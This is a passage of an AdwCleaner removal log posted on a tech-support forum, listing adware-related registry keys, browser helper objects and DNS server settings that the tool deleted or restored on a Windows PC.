    [-] Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [WindoWeather.exe]
    [-] Key Deleted : HKLM\SOFTWARE\bba161f9-9f31-0676-ab03-19d4f658b1c8
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6E993643-8FBC-44FE-BC85-D318495C4D96}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A43DE495-3D00-47D4-9D2C-303115707939}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
    [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{10921475-03CE-4E04-90CE-E2E7EF20C814}
    [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10921475-03CE-4E04-90CE-E2E7EF20C814}
    [-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{79F768ED-0B12-42EF-8257-36751A0ECF3A}]
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{10921475-03CE-4E04-90CE-E2E7EF20C814}
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{10921475-03CE-4E04-90CE-E2E7EF20C814}
    [-] Key Deleted : HKCU\Software\APN PIP
    [-] Key Deleted : HKCU\Software\Store
    [-] Key Deleted : HKCU\Software\WTools
    [-] Key Deleted : HKCU\Software\Probit Software
    [-] Key Deleted : HKCU\Software\Yahoo\Companion
    [-] Key Deleted : HKCU\Software\Microsoft\Tinstalls
    [-] Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
    [-] Key Deleted : HKLM\SOFTWARE\NpApp
    [-] Key Deleted : HKLM\SOFTWARE\SmartDNS
    [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} [NameServer]

    ***** [ Web browsers ] *****


    *************************

    :: "Tracing" keys removed
    :: Winsock settings cleared

    ########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [4679 bytes] ##########
     

Similar Topics

Add New Comment

You need to be a member to leave a comment. Join thousands of tech enthusiasts and participate.
TechSpot Account You may also...